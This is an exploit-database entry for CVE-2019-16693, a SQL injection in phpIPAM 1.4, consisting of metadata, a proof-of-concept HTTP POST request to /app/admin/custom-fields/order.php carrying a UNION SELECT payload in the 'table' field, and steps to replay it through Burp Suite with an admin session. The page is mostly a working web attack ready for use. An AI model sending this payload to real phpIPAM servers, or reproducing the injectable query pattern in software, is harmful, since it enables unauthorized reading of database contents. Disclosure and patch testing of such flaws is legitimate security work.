[] NeoSense
E X P L O I T S
title author type platform port cve id

phpIPAM 1.4 - SQL-Injection

Author: CodeSecLab
type: webapps
platform: php
port: 
date_added: 2025-12-03 
date_updated: 2025-12-03 
verified: 0 
codes: CVE-2019-16693 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: phpIPAM 1.4 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.4
# Tested on: Windows
# CVE : CVE-2019-16693


Proof Of Concept
# Ensure you have a valid user session before executing the PoC.

POST /app/admin/custom-fields/order.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid_session_id>

table=test_table%60+UNION+SELECT+1%2C2%2C3+--+&current=non-empty&next=non-empty&action=add


Steps to Reproduce
1. Login as an admin user.
2. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
3. Observe the result
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.